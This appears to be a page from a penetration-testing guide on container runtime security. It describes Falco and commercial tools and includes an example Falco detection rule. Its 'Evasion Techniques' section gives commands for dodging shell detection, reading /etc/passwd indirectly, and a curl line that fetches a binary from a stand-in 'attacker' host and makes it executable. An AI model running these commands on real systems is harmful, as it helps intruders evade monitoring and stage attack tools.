Runtime Security
Defense
Runtime security tools monitor container behavior for anomalies. Understanding these defenses helps both in testing and evasion.
Runtime Security Tools
Falco
- • eBPF-based monitoring
- • Syscall-level visibility
- • Rule-based detection
- • CNCF project
Aqua/Prisma/Sysdig
- • Commercial solutions
- • Image + runtime protection
- • Network policies
- • Compliance scanning
Common Detection Rules
yaml
# Things Falco typically detects:
# - Shell spawned in container
# - Package manager usage (apt, yum)
# - Network connections to unusual ports
# - Write to /etc/ directories
# - Mount of sensitive paths
# - Privilege escalation attempts
# Example Falco rule
- rule: Terminal shell in container
desc: A shell was used as the entrypoint/exec point
condition: >
spawned_process and container
and shell_procs and proc.tty != 0
output: >
Shell spawned in container
(user=%user.name container=%container.name
shell=%proc.name parent=%proc.pname)
priority: WARNINGEvasion Techniques
bash
# Avoid shell detection - use programming language
python3 -c "import os; os.system('id')"
perl -e 'exec "id"'
# Memory-only execution
# Download and run without touching disk
# GTFOBins alternatives to common tools
# Instead of cat:
tac /etc/passwd | tac
# Instead of ls:
echo *
# Avoid package managers
# Upload static binaries instead
curl -o /tmp/tool http://attacker/tool && chmod +x /tmp/tool